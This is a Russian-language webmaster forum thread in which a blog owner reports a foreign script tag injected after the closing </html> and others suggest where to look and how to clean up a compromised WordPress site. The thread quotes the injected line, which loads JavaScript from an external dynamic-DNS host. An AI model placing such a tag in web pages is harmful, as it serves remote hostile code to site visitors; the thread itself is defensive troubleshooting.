Реклама на сайте Advertise with us

Где искать дырку?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 11.10.05
Сообщения: 773
Рейтинг: 501

Ссылка на сообщениеДобавлено: 21/01/13 в 18:41       Ответить с цитатойцитата 

На блоге появился подключаемый скрипт с вирусней (может не вирусня, конечно, но это не мое icon_smile.gif ), причем вставлен он после </html>

</html><script src="http://eetitqf.dnsalias.com/js/rsize.js"></script>

Где найти как он вставляется? В футере все чисто.

То что надо для адалт трафика - Adult Empire

0
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 18:50       Ответить с цитатойцитата 

ищи по изменениям, лично я знаю 10 вариантов, из них 6 хитровыебаных.

Ну а так для начала, index.php в корне и functions.php проверь. также глянь htaccess там можно добавлять тоже, мало кто знает но встречал.

4
 



С нами с 11.10.12
Сообщения: 428
Рейтинг: 1032


Передовик Master-X (16.11.2012)
Ссылка на сообщениеДобавлено: 21/01/13 в 19:24       Ответить с цитатойцитата 

Код:
php -i | grep auto_append_file

apache, bash, css, elasticsearch, ffmpeg, html, js, mysql, mongo, nginx, php; *nix only

5
 



С нами с 11.10.05
Сообщения: 773
Рейтинг: 501

Ссылка на сообщениеДобавлено: 21/01/13 в 19:41       Ответить с цитатойцитата 

Действительно в index.php в корне было, че-то не посмотрел туда

То что надо для адалт трафика - Adult Empire

0
 



С нами с 09.11.12
Сообщения: 60
Рейтинг: 63

Ссылка на сообщениеДобавлено: 21/01/13 в 19:56       Ответить с цитатойцитата 

Нужно смотреть что в логах. И разматывать цепочку латать уязвимость и чистится.

6
 



С нами с 11.10.05
Сообщения: 773
Рейтинг: 501

Ссылка на сообщениеДобавлено: 21/01/13 в 19:58       Ответить с цитатойцитата 

Уметь бы еще это делать icon_smile.gif

То что надо для адалт трафика - Adult Empire

1
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 20:41       Ответить с цитатойцитата 

mazzzer2: trollface.png дай фтп доступ, деловто 10 минут.

-2
 



С нами с 11.10.05
Сообщения: 773
Рейтинг: 501

Ссылка на сообщениеДобавлено: 21/01/13 в 20:47       Ответить с цитатойцитата 

icon_smile.gif так нашел уже
остальные файлы без изменений
по фтп нельзя же логи посмотреть icon_smile.gif

То что надо для адалт трафика - Adult Empire

1
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 20:54       Ответить с цитатойцитата 

mazzzer2: trollface.png удалить то удалил а как залил то не знаешь ведь.

0
 

Z

С нами с 15.05.05
Сообщения: 55189
Рейтинг: 7770


Передовик Master-X (16.10.2007) Передовик Master-X (16.12.2010) Передовик Master-X (01.02.2015) Передовик Master-X (16.05.2015) Передовик Master-X (01.06.2015) Ветеран трепа Master-X (16.06.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 22:16       Ответить с цитатойцитата 

Дартаньян: а можно поинтересоватся, как ты с FTP доступом узнаешь как его залили ?

andreich дарит вам акцию до 1 000р
КАТАЛОГ ПАРТНЕРОК | Бурж Гембла – тут! | RU Датинг на подписках

0
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 22:28       Ответить с цитатойцитата 

andreich: опять, ты гвардеец, какое тебе дело до этого? Интересно? Так по гугли! trollface.png

-2
 

Z

С нами с 15.05.05
Сообщения: 55189
Рейтинг: 7770


Передовик Master-X (16.10.2007) Передовик Master-X (16.12.2010) Передовик Master-X (01.02.2015) Передовик Master-X (16.05.2015) Передовик Master-X (01.06.2015) Ветеран трепа Master-X (16.06.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 22:39       Ответить с цитатойцитата 

да хули мне гуглить, если нормально настроен сервак, ты даже логов по FTP не сможешь посмотреть

я тебе что Грубил ? помойму ты какойто дальний родственик suomi


mazzzer2: если блог на WP обнови до последней версии, тут я бы вообще предложил радикальные меры, убивание всех файлов кроме папки /wp-content/ ну и конечно фала wp-config.php
ну полежит блог 5 минут ничего страшного
проверь права CHMOD на папки
посмотри что в папке /wp-content/uploads/ (в основном овно как раз туда попадает, так как папка в большинстве случаев имеет CHMOD 777

andreich дарит вам акцию до 1 000р
КАТАЛОГ ПАРТНЕРОК | Бурж Гембла – тут! | RU Датинг на подписках

5
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 22:51       Ответить с цитатойцитата 

andreich: просто ты утомил меня facepalm.gif, на хрен мне логи? я файлики посмотрю, уверяю у меня опыт латания и администрирования этого больше чем у тебя опыта в АВМ, особенно помню про require для удаленных файлов. кстати ты когда включил allow_url_include, сапка то наверное и заработала, только для WP твой гениальный подход это смерть.

mazzzer2: также смени пасс к ftp и админки, проверь если еще один админ или редактор какой левый, есть также плагин и плагин.

4
 

Z

С нами с 15.05.05
Сообщения: 55189
Рейтинг: 7770


Передовик Master-X (16.10.2007) Передовик Master-X (16.12.2010) Передовик Master-X (01.02.2015) Передовик Master-X (16.05.2015) Передовик Master-X (01.06.2015) Ветеран трепа Master-X (16.06.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 23:08       Ответить с цитатойцитата 

Дартаньян писал:
andreich: просто ты утомил меня

ну может быть, но как мне кажется, это ты уже утомил всех на форуме
своми мега весерами мозга

P.S. allow_url_include было там не причем

andreich дарит вам акцию до 1 000р
КАТАЛОГ ПАРТНЕРОК | Бурж Гембла – тут! | RU Датинг на подписках

0
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 23:13       Ответить с цитатойцитата 

andreich писал:
мега весерами
покинь топик ты все равно в этом не шаришь.

-2
 
+ + + + + +


С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809

Ссылка на сообщениеДобавлено: 21/01/13 в 23:22       Ответить с цитатойцитата 

А как вы поняли что у тс вордпрес то trollface.png

1
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 21/01/13 в 23:48       Ответить с цитатойцитата 

awm5433224455: 95% что вордпресс, ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.

-3
 
+ + + + + +


С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809

Ссылка на сообщениеДобавлено: 22/01/13 в 00:18       Ответить с цитатойцитата 

Дартаньян писал:
ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.

smail101.gif да и вордпресс я из за этого не долюбливаю потому что в нем постоянно косяки и над ним нужно корпеть постоянно. А когда разрастается это все до нескольких сайтов тут совсем веселье начинается.
Даже гонки успел обновиться или червь пробежался по всем и проставил фрейма

0
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 22/01/13 в 00:30       Ответить с цитатойцитата 

awm5433224455: trollface.png накатаю мануал, по безопасности для WP.

-1
 



С нами с 22.05.09
Сообщения: 639
Рейтинг: 1087

Ссылка на сообщениеДобавлено: 22/01/13 в 00:57       Ответить с цитатойцитата 

Ты сначала накатай то, что обещал icon_wink.gif

2
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 22/01/13 в 01:12       Ответить с цитатойцитата 

st01en: пишу, учел пожелания доброжелателей к краткому мануалу.

-1
 
+ + + + + +


С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809

Ссылка на сообщениеДобавлено: 22/01/13 в 12:20       Ответить с цитатойцитата 

Дартаньян писал:
awm5433224455: trollface.png накатаю мануал, по безопасности для WP.

Тут нужно осторожно писать, по безопастности лучше не писать. Научишь переломают пол интернета за ночь smail101.gif

0
 

Z

С нами с 15.05.05
Сообщения: 55189
Рейтинг: 7770


Передовик Master-X (16.10.2007) Передовик Master-X (16.12.2010) Передовик Master-X (01.02.2015) Передовик Master-X (16.05.2015) Передовик Master-X (01.06.2015) Ветеран трепа Master-X (16.06.2015)
Ссылка на сообщениеДобавлено: 22/01/13 в 12:29       Ответить с цитатойцитата 

awm5433224455: че он там может написать ? там все сводится к двум вещям - CHMOD правильные и правильно настроенный сервак, вот и все

andreich дарит вам акцию до 1 000р
КАТАЛОГ ПАРТНЕРОК | Бурж Гембла – тут! | RU Датинг на подписках

0
 
+ + + + + +


С нами с 05.11.12
Сообщения: 1938
Рейтинг: 809

Ссылка на сообщениеДобавлено: 22/01/13 в 13:10       Ответить с цитатойцитата 

скрипт кидисы всеравно сумеют нагадить своими дефейсами вида луиз сек

-1
 
+ +
WP-Master

С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123


Передовик Master-X (16.02.2015) Передовик Master-X (01.03.2015)
Ссылка на сообщениеДобавлено: 22/01/13 в 13:35       Ответить с цитатойцитата 

andreich писал:
правильно настроенный сервак
trollface.png вот ты и ответил о чем я напишу.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »